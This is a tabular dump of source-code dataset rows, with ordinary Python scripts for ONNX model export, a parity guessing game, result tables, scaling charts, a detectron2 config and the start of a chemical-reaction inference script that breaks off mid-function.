hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
644ae171f9cc379fd47edfbd764fc2a823f2289c | 8,250 | py | Python | metro/tools/to_onnx.py | eaidova/MeshTransformer | ad85dba75f3b5818533c08dab4c19739e0b730ef | [
"MIT"
] | null | null | null | metro/tools/to_onnx.py | eaidova/MeshTransformer | ad85dba75f3b5818533c08dab4c19739e0b730ef | [
"MIT"
] | null | null | null | metro/tools/to_onnx.py | eaidova/MeshTransformer | ad85dba75f3b5818533c08dab4c19739e0b730ef | [
"MIT"
] | null | null | null | import os
import argparse
import torch
import onnx
from metro.modeling.bert import BertConfig, METRO
from metro.modeling._smpl import SMPL, Mesh
from metro.modeling.hrnet.hrnet_cls_net_featmaps import get_cls_net
from metro.modeling.hrnet.config import config as hrnet_config
from metro.modeling.hrnet.config import update_config as hrnet_update_config
import metro.modeling.data.config as cfg
from metro.utils.renderer import Renderer, visualize_reconstruction, visualize_reconstruction_test, visualize_reconstruction_no_text, visualize_reconstruction_and_att_local
from metro.utils.geometric_layers import orthographic_projection
from metro.utils.logger import setup_logger
from metro.utils.miscellaneous import mkdir, set_seed
if __name__ == "__main__":
main()
| 52.21519 | 172 | 0.671636 | import os
import argparse
import torch
import onnx
from metro.modeling.bert import BertConfig, METRO
from metro.modeling._smpl import SMPL, Mesh
from metro.modeling.hrnet.hrnet_cls_net_featmaps import get_cls_net
from metro.modeling.hrnet.config import config as hrnet_config
from metro.modeling.hrnet.config import update_config as hrnet_update_config
import metro.modeling.data.config as cfg
from metro.utils.renderer import Renderer, visualize_reconstruction, visualize_reconstruction_test, visualize_reconstruction_no_text, visualize_reconstruction_and_att_local
from metro.utils.geometric_layers import orthographic_projection
from metro.utils.logger import setup_logger
from metro.utils.miscellaneous import mkdir, set_seed
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--resume_checkpoint", default=None, type=str, required=False,
help="Path to specific checkpoint for inference.")
parser.add_argument("--model_name_or_path", default='metro/modeling/bert/bert-base-uncased/', type=str, required=False,
help="Path to pre-trained transformer model or model type.")
#########################################################
# Model architectures
#########################################################
parser.add_argument('-a', '--arch', default='hrnet-w64',
help='CNN backbone architecture: hrnet-w64, hrnet, resnet50')
parser.add_argument("--num_hidden_layers", default=4, type=int, required=False,
help="Update model config if given")
parser.add_argument("--hidden_size", default=-1, type=int, required=False,
help="Update model config if given")
parser.add_argument("--num_attention_heads", default=4, type=int, required=False,
help="Update model config if given. Note that the division of "
"hidden_size / num_attention_heads should be in integer.")
parser.add_argument("--intermediate_size", default=-1, type=int, required=False,
help="Update model config if given.")
parser.add_argument("--input_feat_dim", default='2051,512,128', type=str,
help="The Image Feature Dimension.")
parser.add_argument("--hidden_feat_dim", default='1024,256,128', type=str,
help="The Image Feature Dimension.")
parser.add_argument("--legacy_setting", default=True, action='store_true',)
#########################################################
# Others
#########################################################
parser.add_argument("--device", type=str, default='cuda',
help="cuda or cpu")
parser.add_argument('--seed', type=int, default=88,
help="random seed for initialization.")
args = parser.parse_args()
return args
def main():
global logger
logger = setup_logger('MeshTransformer', '.', 0)
os.environ['NO_APEX'] = 'true'
from metro.modeling.bert import METRO_Body_Network_ONNX as METRO_Network
args = parse_args()
mesh_smpl = SMPL().to(args.device)
mesh_sampler = Mesh()
# Build model from scratch, and load weights from state_dict.bin
trans_encoder = []
input_feat_dim = [int(item) for item in args.input_feat_dim.split(',')]
hidden_feat_dim = [int(item) for item in args.hidden_feat_dim.split(',')]
output_feat_dim = input_feat_dim[1:] + [3]
# init three transformer encoders in a loop
for i in range(len(output_feat_dim)):
config_class, model_class = BertConfig, METRO
config = config_class.from_pretrained(args.model_name_or_path)
config.output_attentions = False
config.img_feature_dim = input_feat_dim[i]
config.output_feature_dim = output_feat_dim[i]
args.hidden_size = hidden_feat_dim[i]
if args.legacy_setting:
# During our paper submission, we were using the original intermediate size, which is 3072 fixed
# We keep our legacy setting here
args.intermediate_size = -1
else:
# We have recently tried to use an updated intermediate size, which is 4*hidden-size.
# But we didn't find significant performance changes on Human3.6M (~36.7 PA-MPJPE)
args.intermediate_size = int(args.hidden_size * 4)
# update model structure if specified in arguments
update_params = ['num_hidden_layers', 'hidden_size', 'num_attention_heads', 'intermediate_size']
for idx, param in enumerate(update_params):
arg_param = getattr(args, param)
config_param = getattr(config, param)
if arg_param > 0 and arg_param != config_param:
logger.info("Update config parameter {}: {} -> {}".format(param, config_param, arg_param))
setattr(config, param, arg_param)
# init a transformer encoder and append it to a list
assert config.hidden_size % config.num_attention_heads == 0
model = model_class(config=config)
logger.info("Init model from scratch.")
trans_encoder.append(model)
if args.arch=='hrnet':
hrnet_yaml = 'models/hrnet/cls_hrnet_w40_sgd_lr5e-2_wd1e-4_bs32_x100.yaml'
hrnet_checkpoint = 'models/hrnet/hrnetv2_w40_imagenet_pretrained.pth'
hrnet_update_config(hrnet_config, hrnet_yaml)
backbone = get_cls_net(hrnet_config, pretrained=hrnet_checkpoint)
logger.info('=> loading hrnet-v2-w40 model')
elif args.arch=='hrnet-w64':
hrnet_yaml = 'models/hrnet/cls_hrnet_w64_sgd_lr5e-2_wd1e-4_bs32_x100.yaml'
hrnet_checkpoint = 'models/hrnet/hrnetv2_w64_imagenet_pretrained.pth'
hrnet_update_config(hrnet_config, hrnet_yaml)
backbone = get_cls_net(hrnet_config, pretrained=hrnet_checkpoint)
logger.info('=> loading hrnet-v2-w64 model')
else:
print("=> using pre-trained model '{}'".format(args.arch))
backbone = models.__dict__[args.arch](pretrained=True)
# remove the last fc layer
backbone = torch.nn.Sequential(*list(backbone.children())[:-2])
trans_encoder = torch.nn.Sequential(*trans_encoder)
total_params = sum(p.numel() for p in trans_encoder.parameters())
logger.info('Transformers total parameters: {}'.format(total_params))
backbone_total_params = sum(p.numel() for p in backbone.parameters())
logger.info('Backbone total parameters: {}'.format(backbone_total_params))
# build end-to-end METRO network (CNN backbone + multi-layer transformer encoder)
_metro_network = METRO_Network(args, config, backbone, trans_encoder, mesh_sampler, mesh_smpl)
logger.info("Loading state dict from checkpoint {}".format(args.resume_checkpoint))
cpu_device = torch.device('cpu')
state_dict = torch.load(args.resume_checkpoint, map_location=cpu_device)
_metro_network.load_state_dict(state_dict, strict=False)
del state_dict
setattr(_metro_network.trans_encoder[-1].config,'output_attentions', True)
setattr(_metro_network.trans_encoder[-1].config,'output_hidden_states', True)
_metro_network.trans_encoder[-1].bert.encoder.output_attentions = True
_metro_network.trans_encoder[-1].bert.encoder.output_hidden_states = True
for iter_layer in range(4):
_metro_network.trans_encoder[-1].bert.encoder.layer[iter_layer].attention.self.output_attentions = True
for inter_block in range(3):
setattr(_metro_network.trans_encoder[-1].config,'device', args.device)
_metro_network.to(args.device)
_metro_network.eval()
batch_imgs = torch.zeros((1, 3, 224, 224)).to(args.device)
logger.info('Run model export')
with torch.no_grad():
torch.onnx.export(_metro_network, batch_imgs, 'mesh_transformer.onnx', opset_version=11, output_names=[
'pred_camera', 'pred_3d_joints', 'pred_vertices_sub2', 'pred_vertices_sub', 'pred_vertices', 'hidden_states', 'att'
])
logger.info('Check exported model')
onnx_model = onnx.load("mesh_transformer.onnx")
onnx.checker.check_model(onnx_model)
if __name__ == "__main__":
main()
| 7,432 | 0 | 46 |
cc75e71486904c22f3b836a13033517af05fbde3 | 964 | py | Python | Aula15/exercicio_68.py | brenuvida/cursoemvideo | 8d482ea802ed93d984131f72188288c4ebdfc532 | [
"MIT"
] | null | null | null | Aula15/exercicio_68.py | brenuvida/cursoemvideo | 8d482ea802ed93d984131f72188288c4ebdfc532 | [
"MIT"
] | null | null | null | Aula15/exercicio_68.py | brenuvida/cursoemvideo | 8d482ea802ed93d984131f72188288c4ebdfc532 | [
"MIT"
] | null | null | null | from random import randint
print(' === Vamos jogar par ou ímpar? === \n\n')
venceu = 0
jog = 0
while True:
num = int(input('\n\nDigite um número para jogar: '))
jog += 1
escolha = str(input('\n\nDigite P ou I para Par ou Ímpar: ')).upper().strip()[0]
compu = randint(0, 10)
if escolha == 'P':
if (num + compu) % 2 == 0:
print('\n\nO computador escolheu {}. Você venceu'.format(compu))
venceu += 1
break
else:
print('\n\nO computador escolheu {}. Você perdeu, jogue novamente'.format(compu))
if escolha == 'I':
if (num + compu) % 2 != 0:
print('\n\nO computador escolheu {}. Você venceu'.format(compu))
venceu +=1
break
else:
print('\n\nO computador escolheu {}. Você perdeu, jogue novamente'.format(compu))
print('\n\nVocê jogou {} veze(s) e ganhou {} partida(s)'.format(jog, venceu))
| 34.428571 | 93 | 0.539419 | from random import randint
print(' === Vamos jogar par ou ímpar? === \n\n')
venceu = 0
jog = 0
while True:
num = int(input('\n\nDigite um número para jogar: '))
jog += 1
escolha = str(input('\n\nDigite P ou I para Par ou Ímpar: ')).upper().strip()[0]
compu = randint(0, 10)
if escolha == 'P':
if (num + compu) % 2 == 0:
print('\n\nO computador escolheu {}. Você venceu'.format(compu))
venceu += 1
break
else:
print('\n\nO computador escolheu {}. Você perdeu, jogue novamente'.format(compu))
if escolha == 'I':
if (num + compu) % 2 != 0:
print('\n\nO computador escolheu {}. Você venceu'.format(compu))
venceu +=1
break
else:
print('\n\nO computador escolheu {}. Você perdeu, jogue novamente'.format(compu))
print('\n\nVocê jogou {} veze(s) e ganhou {} partida(s)'.format(jog, venceu))
| 0 | 0 | 0 |
de753bdbf977e7ef54dd3cfdd5cdce4da9e15de6 | 3,062 | py | Python | social_table.py | kit-algo/fpt-editing | 74620a1b4eca14920a05d8c9e74bdbfc9a4808a5 | [
"MIT"
] | 1 | 2021-02-18T14:09:04.000Z | 2021-02-18T14:09:04.000Z | social_table.py | kit-algo/fpt-editing | 74620a1b4eca14920a05d8c9e74bdbfc9a4808a5 | [
"MIT"
] | null | null | null | social_table.py | kit-algo/fpt-editing | 74620a1b4eca14920a05d8c9e74bdbfc9a4808a5 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import argparse
import collections
import pandas as pd
import numpy as np
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Generate the results table of the social instances")
parser.add_argument("csv", help="The CSV input file")
parser.add_argument("gurobi_csv", help="The Gurobi CSV input file")
parser.add_argument("gurobi_fpt_comparison_csv",
help="The FPT results to compare to Gurobi")
parser.add_argument(
'--time-limit',
type=int,
help="The maximum running time to use in seconds, default: 1000",
default=1000)
args = parser.parse_args()
df = pd.read_csv(args.csv)
filtered_df = df[df['Total Time [s]'] <= args.time_limit]
gurobi_df = pd.read_csv(args.gurobi_csv)
filtered_gurobi_df = gurobi_df[~gurobi_df.Algorithm.str.contains('Heuristic')]
gurobi_fpt_df = pd.read_csv(args.gurobi_fpt_comparison_csv)
filtered_gurobi_fpt_df = gurobi_fpt_df[gurobi_fpt_df['Total Time [s]'] <= args.time_limit]
fpt_algo = 'FPT-LS-MP'
ilp_algo = 'ILP-S-R-C4'
all_solutions = False
fpt_data = filtered_gurobi_fpt_df[(filtered_gurobi_fpt_df.Algorithm == fpt_algo) & (filtered_gurobi_fpt_df['All Solutions'] == all_solutions)]
ilp_data = filtered_gurobi_df[filtered_gurobi_df.Algorithm == ilp_algo]
general_data = fpt_data.groupby('Graph')[['n', 'm']].first()
solved_data = ilp_data.groupby('Graph')['Solved'].any()
fpt_st_data = get_max_k_time(fpt_data[~fpt_data.MT])
fpt_mt_data = get_max_k_time(fpt_data[fpt_data.MT])
ilp_st_data = get_max_k_time(ilp_data[~ilp_data.MT])
ilp_mt_data = get_max_k_time(ilp_data[ilp_data.MT])
df = pd.DataFrame(collections.OrderedDict([
(('', '', 'Graph'), general_data.index),
(('', '', 'n'), general_data.n),
(('', '', 'm'), general_data.m),
#(('', '', 'Solved'), solved_data),
(('FPT', '1 core', 'k'), fpt_st_data.k),
(('FPT', '1 core', 'Time [s]'), fpt_st_data['Total Time [s]']),
(('FPT', '16 cores', 'k'), fpt_mt_data.k),
(('FPT', '16 cores', 'Time [s]'), fpt_mt_data['Total Time [s]']),
# subtract one for unsolved graphs
(('ILP', '1 core', 'k'), ilp_st_data.k - (~ilp_st_data.Solved)),
(('ILP', '1 core', 'Time [s]'), ilp_st_data['Total Time [s]']),
(('ILP', '16 cores', 'k'), ilp_mt_data.k - (~ilp_mt_data.Solved)),
(('ILP', '16 cores', 'Time [s]'), ilp_mt_data['Total Time [s]']),
]))
df.sort_values(by=('FPT', '1 core', 'Time [s]'), inplace=True)
print(df.to_latex(index=False, formatters=
{('', '', 'Solved') : lambda x : 'Yes' if x else 'No'},
float_format=lambda x : "{:.2f}".format(x), na_rep=" "))
| 41.378378 | 146 | 0.61855 | #!/usr/bin/python3
import argparse
import collections
import pandas as pd
import numpy as np
def get_max_k_time(df):
df = df.copy()
graph_groups = df.groupby('Graph')
df['max_k'] = graph_groups.k.transform(np.max)
max_k_df = df[df.k == df.max_k]
return max_k_df.groupby('Graph')[['k', 'Total Time [s]', 'Solved']].min()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Generate the results table of the social instances")
parser.add_argument("csv", help="The CSV input file")
parser.add_argument("gurobi_csv", help="The Gurobi CSV input file")
parser.add_argument("gurobi_fpt_comparison_csv",
help="The FPT results to compare to Gurobi")
parser.add_argument(
'--time-limit',
type=int,
help="The maximum running time to use in seconds, default: 1000",
default=1000)
args = parser.parse_args()
df = pd.read_csv(args.csv)
filtered_df = df[df['Total Time [s]'] <= args.time_limit]
gurobi_df = pd.read_csv(args.gurobi_csv)
filtered_gurobi_df = gurobi_df[~gurobi_df.Algorithm.str.contains('Heuristic')]
gurobi_fpt_df = pd.read_csv(args.gurobi_fpt_comparison_csv)
filtered_gurobi_fpt_df = gurobi_fpt_df[gurobi_fpt_df['Total Time [s]'] <= args.time_limit]
fpt_algo = 'FPT-LS-MP'
ilp_algo = 'ILP-S-R-C4'
all_solutions = False
fpt_data = filtered_gurobi_fpt_df[(filtered_gurobi_fpt_df.Algorithm == fpt_algo) & (filtered_gurobi_fpt_df['All Solutions'] == all_solutions)]
ilp_data = filtered_gurobi_df[filtered_gurobi_df.Algorithm == ilp_algo]
general_data = fpt_data.groupby('Graph')[['n', 'm']].first()
solved_data = ilp_data.groupby('Graph')['Solved'].any()
fpt_st_data = get_max_k_time(fpt_data[~fpt_data.MT])
fpt_mt_data = get_max_k_time(fpt_data[fpt_data.MT])
ilp_st_data = get_max_k_time(ilp_data[~ilp_data.MT])
ilp_mt_data = get_max_k_time(ilp_data[ilp_data.MT])
df = pd.DataFrame(collections.OrderedDict([
(('', '', 'Graph'), general_data.index),
(('', '', 'n'), general_data.n),
(('', '', 'm'), general_data.m),
#(('', '', 'Solved'), solved_data),
(('FPT', '1 core', 'k'), fpt_st_data.k),
(('FPT', '1 core', 'Time [s]'), fpt_st_data['Total Time [s]']),
(('FPT', '16 cores', 'k'), fpt_mt_data.k),
(('FPT', '16 cores', 'Time [s]'), fpt_mt_data['Total Time [s]']),
# subtract one for unsolved graphs
(('ILP', '1 core', 'k'), ilp_st_data.k - (~ilp_st_data.Solved)),
(('ILP', '1 core', 'Time [s]'), ilp_st_data['Total Time [s]']),
(('ILP', '16 cores', 'k'), ilp_mt_data.k - (~ilp_mt_data.Solved)),
(('ILP', '16 cores', 'Time [s]'), ilp_mt_data['Total Time [s]']),
]))
df.sort_values(by=('FPT', '1 core', 'Time [s]'), inplace=True)
print(df.to_latex(index=False, formatters=
{('', '', 'Solved') : lambda x : 'Yes' if x else 'No'},
float_format=lambda x : "{:.2f}".format(x), na_rep=" "))
| 225 | 0 | 23 |
62b478719b683a043f86688b7725d75105d8d843 | 1,923 | py | Python | charts/distributed_scaling.py | twmarshall/tbd | 35de2a72515f5f1d0004c3d1ca896f5ef7cb4ce4 | [
"Apache-2.0"
] | null | null | null | charts/distributed_scaling.py | twmarshall/tbd | 35de2a72515f5f1d0004c3d1ca896f5ef7cb4ce4 | [
"Apache-2.0"
] | null | null | null | charts/distributed_scaling.py | twmarshall/tbd | 35de2a72515f5f1d0004c3d1ca896f5ef7cb4ce4 | [
"Apache-2.0"
] | 2 | 2015-03-03T03:39:26.000Z | 2015-04-13T14:34:11.000Z | #!/usr/bin/env python
# a bar plot with errorbars
import matplotlib.pyplot as plt
import numpy as np
import string
graph_dir = "charts/"
N = 1
width = 0.01 # the width of the bars
ind = np.arange(N) # the x locations for the groups
fig, ax = plt.subplots()
# initial run
(tdbMeans, tdbStd) = readFile("scaling_tdb.txt")
tdbMeans = [1.557289895]
rects1 = ax.bar(ind, tdbMeans, width, color='#3c78d8')
# update 10
#oneMeans= [0.3277027027]
#oneMeans = [0]
#rects2 = ax.bar(ind+width, oneMeans, width, color='#6aa84f')
# update 100
twoMeans = [0.9172152797]
#twoMeans = [0]
rects3 = ax.bar(ind+width, twoMeans, width, color='#e69138')
# update 1000
threeMeans = [1.136780069]
#threeMeans = [0]
rects4 = ax.bar(ind+width*2, threeMeans, width, color='#6aa84f')
#f1c232')
fontsize = '20'
# add some text for labels, title and axes ticks
ax.set_xlabel('Machines', fontsize=fontsize)
ax.set_xlim([-width, (N - 1) + 4 * width])
ax.set_ylabel('Speedup', fontsize=fontsize)
ax.set_title('Distributed', fontsize=fontsize)
ax.set_xticks(ind+width * 1.5)
ax.set_xticklabels( ('2'))
plt.tick_params(axis='both', which='major', labelsize=fontsize)
plt.tick_params(axis='both', which='minor', labelsize=fontsize)
#ax.legend( (rects1[0], rects2[0], rects3[0], rects4[0]), ('Initial Run', 'Update 10', 'Update 100', 'Update 1000'), loc='best' )
ax.legend( (rects1[0], rects3[0], rects4[0]), ('Initial Run', 'Update 100', 'Update 1000'), loc='best' )
#ax.legend( (rects1[0], rects2[0]), ('Initial Run', 'Update 10'), loc='best' )
#ax.legend( (rects1[0],), ('Initial Run',), loc='best' )
#plt.show()
plt.gcf().set_size_inches(7, 10)
plt.savefig(graph_dir + 'distributed_scaling.png')
| 30.046875 | 129 | 0.668747 | #!/usr/bin/env python
# a bar plot with errorbars
import matplotlib.pyplot as plt
import numpy as np
import string
graph_dir = "charts/"
N = 1
width = 0.01 # the width of the bars
ind = np.arange(N) # the x locations for the groups
fig, ax = plt.subplots()
def readFile(file):
file = open(graph_dir + file, 'r')
means = []
std = []
for line in file:
split = string.split(line)
means.append(float(split[0]))
#std.append(float(split[1]))
return (means, std)
# initial run
(tdbMeans, tdbStd) = readFile("scaling_tdb.txt")
tdbMeans = [1.557289895]
rects1 = ax.bar(ind, tdbMeans, width, color='#3c78d8')
# update 10
#oneMeans= [0.3277027027]
#oneMeans = [0]
#rects2 = ax.bar(ind+width, oneMeans, width, color='#6aa84f')
# update 100
twoMeans = [0.9172152797]
#twoMeans = [0]
rects3 = ax.bar(ind+width, twoMeans, width, color='#e69138')
# update 1000
threeMeans = [1.136780069]
#threeMeans = [0]
rects4 = ax.bar(ind+width*2, threeMeans, width, color='#6aa84f')
#f1c232')
fontsize = '20'
# add some text for labels, title and axes ticks
ax.set_xlabel('Machines', fontsize=fontsize)
ax.set_xlim([-width, (N - 1) + 4 * width])
ax.set_ylabel('Speedup', fontsize=fontsize)
ax.set_title('Distributed', fontsize=fontsize)
ax.set_xticks(ind+width * 1.5)
ax.set_xticklabels( ('2'))
plt.tick_params(axis='both', which='major', labelsize=fontsize)
plt.tick_params(axis='both', which='minor', labelsize=fontsize)
#ax.legend( (rects1[0], rects2[0], rects3[0], rects4[0]), ('Initial Run', 'Update 10', 'Update 100', 'Update 1000'), loc='best' )
ax.legend( (rects1[0], rects3[0], rects4[0]), ('Initial Run', 'Update 100', 'Update 1000'), loc='best' )
#ax.legend( (rects1[0], rects2[0]), ('Initial Run', 'Update 10'), loc='best' )
#ax.legend( (rects1[0],), ('Initial Run',), loc='best' )
#plt.show()
plt.gcf().set_size_inches(7, 10)
plt.savefig(graph_dir + 'distributed_scaling.png')
| 221 | 0 | 23 |
c1af956c6691e50e9b0fd600489a383527d1d08d | 181 | py | Python | src/epython/errors/__init__.py | elibs/epython | 8e490976f510ab6393739c42f9981495503fb454 | [
"MIT"
] | null | null | null | src/epython/errors/__init__.py | elibs/epython | 8e490976f510ab6393739c42f9981495503fb454 | [
"MIT"
] | 1 | 2021-07-19T17:20:49.000Z | 2021-07-19T17:20:49.000Z | src/epython/errors/__init__.py | elibs/epython | 8e490976f510ab6393739c42f9981495503fb454 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Description:
EPython's custom exceptions
Author:
Ray Gomez
Date:
3/20/21
"""
from epython.errors import filters, poke, network, ssh, util
| 12.928571 | 60 | 0.640884 | # -*- coding: utf-8 -*-
"""
Description:
EPython's custom exceptions
Author:
Ray Gomez
Date:
3/20/21
"""
from epython.errors import filters, poke, network, ssh, util
| 0 | 0 | 0 |
56b3994df249884d4816fc9a5c7f553a9ab6f400 | 1,178 | py | Python | configs/common/models/keypoint_rcnn_fpn.py | mmabrouk/detectron2 | 158e395acdb8ca6ed6d488b43475f9ef9d200405 | [
"Apache-2.0"
] | 21,274 | 2019-10-10T17:50:46.000Z | 2022-03-31T17:58:45.000Z | configs/common/models/keypoint_rcnn_fpn.py | mmabrouk/detectron2 | 158e395acdb8ca6ed6d488b43475f9ef9d200405 | [
"Apache-2.0"
] | 3,253 | 2019-10-10T20:39:47.000Z | 2022-03-31T22:27:53.000Z | configs/common/models/keypoint_rcnn_fpn.py | mmabrouk/detectron2 | 158e395acdb8ca6ed6d488b43475f9ef9d200405 | [
"Apache-2.0"
] | 6,288 | 2019-10-10T18:00:27.000Z | 2022-03-31T21:22:58.000Z | from detectron2.config import LazyCall as L
from detectron2.layers import ShapeSpec
from detectron2.modeling.poolers import ROIPooler
from detectron2.modeling.roi_heads import KRCNNConvDeconvUpsampleHead
from .mask_rcnn_fpn import model
[model.roi_heads.pop(x) for x in ["mask_in_features", "mask_pooler", "mask_head"]]
model.roi_heads.update(
num_classes=1,
keypoint_in_features=["p2", "p3", "p4", "p5"],
keypoint_pooler=L(ROIPooler)(
output_size=14,
scales=(1.0 / 4, 1.0 / 8, 1.0 / 16, 1.0 / 32),
sampling_ratio=0,
pooler_type="ROIAlignV2",
),
keypoint_head=L(KRCNNConvDeconvUpsampleHead)(
input_shape=ShapeSpec(channels=256, width=14, height=14),
num_keypoints=17,
conv_dims=[512] * 8,
loss_normalizer="visible",
),
)
# Detectron1 uses 2000 proposals per-batch, but this option is per-image in detectron2.
# 1000 proposals per-image is found to hurt box AP.
# Therefore we increase it to 1500 per-image.
model.proposal_generator.post_nms_topk = (1500, 1000)
# Keypoint AP degrades (though box AP improves) when using plain L1 loss
model.roi_heads.box_predictor.smooth_l1_beta = 0.5
| 34.647059 | 87 | 0.719015 | from detectron2.config import LazyCall as L
from detectron2.layers import ShapeSpec
from detectron2.modeling.poolers import ROIPooler
from detectron2.modeling.roi_heads import KRCNNConvDeconvUpsampleHead
from .mask_rcnn_fpn import model
[model.roi_heads.pop(x) for x in ["mask_in_features", "mask_pooler", "mask_head"]]
model.roi_heads.update(
num_classes=1,
keypoint_in_features=["p2", "p3", "p4", "p5"],
keypoint_pooler=L(ROIPooler)(
output_size=14,
scales=(1.0 / 4, 1.0 / 8, 1.0 / 16, 1.0 / 32),
sampling_ratio=0,
pooler_type="ROIAlignV2",
),
keypoint_head=L(KRCNNConvDeconvUpsampleHead)(
input_shape=ShapeSpec(channels=256, width=14, height=14),
num_keypoints=17,
conv_dims=[512] * 8,
loss_normalizer="visible",
),
)
# Detectron1 uses 2000 proposals per-batch, but this option is per-image in detectron2.
# 1000 proposals per-image is found to hurt box AP.
# Therefore we increase it to 1500 per-image.
model.proposal_generator.post_nms_topk = (1500, 1000)
# Keypoint AP degrades (though box AP improves) when using plain L1 loss
model.roi_heads.box_predictor.smooth_l1_beta = 0.5
| 0 | 0 | 0 |
c4aee8c4240ebf4b57f438f4e407d1707d094e4d | 7,870 | py | Python | inference.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 13 | 2019-10-01T08:35:47.000Z | 2022-02-07T03:24:05.000Z | inference.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | null | null | null | inference.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 2 | 2021-08-12T05:14:45.000Z | 2021-11-30T07:29:31.000Z | import chainer
from chainer import functions
import numpy as cp
# import cupy as cp
import json
'''
whole framework: a->(p->A->s)
'''
if __name__ == '__main__':
import chainer
from chainer import serializers
from chainer.iterators import SerialIterator
from chainer_chemistry.dataset.converters import concat_mols
from dataset import uspto_dataset
from models.nn import ggnngwm_stop_step, ggnngwm_atom, ggnngwm_pair_step, ggnngwn_action_step
import logging
import argparse
from distutils.util import strtobool
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser(description='')
parser.add_argument('--hdim', type=int, default=100)
parser.add_argument('--n_layers', type=int, default=3)
parser.add_argument('--nn_hidden_dim', type=int, default=50)
parser.add_argument('--concat_hidden', type=strtobool, default='false')
parser.add_argument('--weight_tying', type=strtobool, default='false')
parser.add_argument('--gwm', type=strtobool, default='true')
parser.add_argument('--topK', type=int, default=10)
parser.add_argument('--g_stop', default='inference/snapshot_stop')
parser.add_argument('--g_atom', default='inference/snapshot_atom')
parser.add_argument('--g_pair', default='inference/snapshot_pair')
parser.add_argument('--g_action', default='inference/snapshot_action')
parser.add_argument('--test_path', default='dataset/test.txt.proc')
parser.add_argument('--out', default='result_all/inference1')
args = parser.parse_args()
g_stop = ggnngwm_stop_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm)
chainer.serializers.load_npz(args.g_stop, g_stop)
g_atom = ggnngwm_atom(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm,
topK=args.topK)
chainer.serializers.load_npz(args.g_atom, g_atom)
g_pair = ggnngwm_pair_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm,
topK=args.topK)
chainer.serializers.load_npz(args.g_pair, g_pair)
g_action = ggnngwn_action_step(out_dim=args.hdim, hidden_dim=args.hdim, n_layers=args.n_layers,
concat_hidden=args.concat_hidden, weight_tying=args.weight_tying,
nn_hidden_dim=args.nn_hidden_dim,
gwm=args.gwm)
chainer.serializers.load_npz(args.g_action, g_action)
# chainer.cuda.get_device_from_id(0).use()
# g_stop.to_gpu()
valid_raw = uspto_dataset.read_data(args.test_path)
valid_dataset = uspto_dataset.USPTO_dataset(valid_raw)
valid_iter = SerialIterator(valid_dataset, 20, repeat=False, shuffle=False)
one_part_acc = []
for batch in valid_iter:
# get one batch of test data
f_atoms, f_bonds, super_node_x, \
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select, \
action, step_num, \
stop_idx, \
sample_index = concat_mols(batch, device=-1)
atom_label -= 1
mask_reagents -= 2
mask_reactants_reagents -= 2
action -= 1
with chainer.using_config('train', False):
inference(g_stop, g_atom, g_pair, g_action,
f_atoms, f_bonds, super_node_x,
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
action, step_num,
stop_idx,
sample_index, valid_raw, args.out)
| 40.777202 | 103 | 0.596442 | import chainer
from chainer import functions
import numpy as cp
# import cupy as cp
import json
def record(a, p, A, s, ind, d, name):
for i in range(20):
raw = d[ind[i]]
dic = {
'atoms': a[i].tolist(),
'pairs': p[i].tolist(),
'actions': A[i].tolist(),
'stops': s[i].tolist(),
'index': ind[i].tolist(),
'raw': {
'reactants_reagents': raw[0],
'products': raw[1],
'label': raw[2]
}
}
with open(name + '_final.txt', 'a') as file:
json.dump(dic, file)
file.write('\n')
'''
whole framework: a->(p->A->s)
'''
def inference(g_stop, g_atom, g_pair, g_action,
f_atoms, f_bonds, super_node_x,
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
action, step_num,
stop_idx,
sample_index, data_raw, name):
# select atoms
